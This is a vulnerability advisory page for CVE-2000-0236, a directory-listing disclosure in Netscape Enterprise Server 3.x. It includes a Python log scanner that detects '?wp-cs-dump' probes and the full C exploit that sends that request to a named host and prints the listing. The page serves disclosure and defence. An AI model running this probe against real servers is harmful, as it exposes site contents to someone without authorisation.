Netscape Enterprise Server 3.x Web Publishing Directory Listing Disclosure Vulnerability

Vulnerability ID 1105754   Vulnerability type Configuration error
Published 2000-03-17   Updated 2006-09-05
CVE number CVE-2000-0236   CNNVD ID CNNVD-200003-035
Platform Multiple   CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/19814
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-035
|Vulnerability details
Netscape Enterprise Server is a web server developed by Netscape. In Netscape Enterprise Server 3.x, the "Web Publishing" feature allows a remote attacker to browse the contents of the document root and its subdirectories. The attacker only has to submit a URL that carries a Web Publishing tag (?wp). Netscape Enterprise Server ships with "Directory Indexing" enabled by default; disabling directory listing prevents the problem.
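The probe and its detection, as an added example that is not part of this advisory or of the exploit reproduced on this page: it builds the request the exploit sends (GET /?wp-cs-dump HTTP/1.0) in clear text, and flags access-log entries whose query string is a Web Publishing tag, splitting them by whether the server answered with 200 (listing most likely served) or not. The log lines are constructed for the example; treating every `wp-<name>` query token as a Web Publishing tag rather than only `wp-cs-dump` is an assumption, made because the advisory speaks of several such tags without listing them.

```python
import re
from urllib.parse import urlsplit

# wp-cs-dump is the tag the exploit on this page uses. Any other query token of
# the form "wp-<name>" is treated as a Web Publishing tag as well (assumption:
# the feature's instructional tags all share the "wp-" prefix).
WP_TAG_RE = re.compile(r"^wp-[a-z-]+$")

# Common Log Format: host ident authuser [date] "method target proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample access log (not real traffic): one normal request, three
# Web Publishing probes (two answered with 200, one with 404), a query that
# merely contains "wp", and a line that is not CLF at all.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Mar/2000:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1234',
    '192.0.2.10 - - [17/Mar/2000:10:00:02 +0000] "GET /?wp-cs-dump HTTP/1.0" 200 8765',
    '192.0.2.11 - - [17/Mar/2000:10:00:03 +0000] "GET /docs/?wp-cs-dump HTTP/1.0" 200 4321',
    '192.0.2.12 - - [17/Mar/2000:10:00:04 +0000] "GET /search?wp=1 HTTP/1.0" 200 100',
    '192.0.2.13 - - [17/Mar/2000:10:00:05 +0000] "GET /?wp-cs-dump HTTP/1.0" 404 0',
    'not a log line',
]


def build_probe(path="/"):
    """The request the exploit on this page sends, in clear text.

    The exploit hard-codes it as hex bytes: GET /?wp-cs-dump HTTP/1.0 followed
    by two line feeds. It is HTTP/1.0, so no Host header is required.
    """
    return "GET {}?wp-cs-dump HTTP/1.0\n\n".format(path).encode("ascii")


def wp_tag(target):
    """Return the Web Publishing tag carried by a request target, or None.

    ?wp-cs-dump has no '=', so the tag is the first '&'-separated query token.
    """
    token = urlsplit(target).query.split("&", 1)[0].lower()
    return token if WP_TAG_RE.match(token) else None


def scan_log(lines):
    """Return (client, target, tag, status) for every request carrying a ?wp- tag."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if m is None:
            continue
        tag = wp_tag(m.group("target"))
        if tag is not None:
            hits.append((m.group("host"), m.group("target"), tag, int(m.group("status"))))
    return hits


def served_listings(hits):
    """Keep only probes answered with 200: the listing was most likely returned,
    i.e. Web Publishing / Directory Indexing is still enabled on that server."""
    return [h for h in hits if h[3] == 200]


if __name__ == "__main__":
    probes = scan_log(SAMPLE_LOG)
    for client, target, tag, status in probes:
        print("{} requested {} ({}) -> {}".format(client, target, tag, status))
    print("{} probe(s), {} answered with a listing".format(
        len(probes), len(served_listings(probes))))
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; a probe answered with 200 after the fix date is the signal worth an alert, since a server with Directory Indexing disabled should not return a listing for the tag.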
|Vulnerability EXP
source: http://www.securityfocus.com/bid/1063/info

Netscape Enterprise Server 3.x includes a poorly documented feature that will allow remote users to view directory listings by appending various instructional tags to the URL. Although it can be disabled, Netscape Enterprise Server is shipped with the "Directory Indexing" feature enabled by default. 

/*
 *	Server: Netscape-Enterprise
 *	This exploit is about the Web Publishing "?wp-cs-dump" directory listing vuln.
 *	It sends the tag to the server and prints the raw HTTP response.
 *
 *	Written by Gabriel Maggiotti
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define SEND	10000
#define RECIVE	100000


/* Replace the first occurrence of orig in string with rep.
 * Left over from the original exploit; main() does not use it. */
char *str_replace(char *rep, char *orig, char *string)
{
char buf[SEND]="";
char *pt=strstr(string,orig);

if(pt==NULL)			/* orig not present: nothing to do */
	return string;

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd, numbytes=0, total=0;
char recv_buf[RECIVE];
int port;

/* "GET /?wp-cs-dump HTTP/1.0\n\n": the ?wp-cs-dump Web Publishing tag asks
 * the server to dump the listing of the requested directory (here the
 * document root). HTTP/1.0, so no Host header is needed. */
char inject[SEND]=
	"\x47\x45\x54\x20\x2f\x3f\x77\x70\x2d\x63\x73\x2d"
	"\x64\x75\x6d\x70\x20\x48\x54\x54\x50\x2f\x31\x2e"
	"\x30\xa\xa";

struct hostent *he;
struct sockaddr_in their_addr;

if(argc!=3)
{
	fprintf(stderr,"usage:%s <hostname> <port>\n",argv[0]);
	exit(1);
}

if((he=gethostbyname(argv[1]))==NULL)
{
	fprintf(stderr,"gethostbyname: cannot resolve %s\n",argv[1]);
	exit(1);
}

port=atoi(argv[2]);
if(port<=0 || port>65535)
{
	fprintf(stderr,"bad port: %s\n",argv[2]);
	exit(1);
}

if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
	perror("socket");
	exit(1);
}

memset(&their_addr,0,sizeof(their_addr));
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
memcpy(&their_addr.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(their_addr))==-1)
{
	perror("connect");
	exit(1);
}

/* send only the request itself, not the whole SEND-byte buffer */
if(send(sockfd,inject,strlen(inject),0) ==-1)
{
	perror("send");
	exit(1);
}

/* a listing can span several segments: read until the server closes the
 * connection or the buffer is full, leaving one byte for the terminator */
while(total<RECIVE-1 &&
      (numbytes=recv(sockfd,recv_buf+total,RECIVE-1-total,0))>0)
	total+=numbytes;

if(numbytes==-1)
{
	perror("recv");
	exit(1);
}

recv_buf[total]='\0';
fwrite(recv_buf,1,total,stdout);	/* raw response, headers included */
putchar('\n');

close(sockfd);

return 0;
}
|References

Source: BUGTRAQ
Name: 20000317 [SAFER 000317.EXP.1.5] Netscape Enterprise Server and '?wp' tags
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com
Source: BID
Name: 1063
Link: http://www.securityfocus.com/bid/1063
Source: NSFOCUS
Name: 403
Link: http://www.nsfocus.net/vulndb/403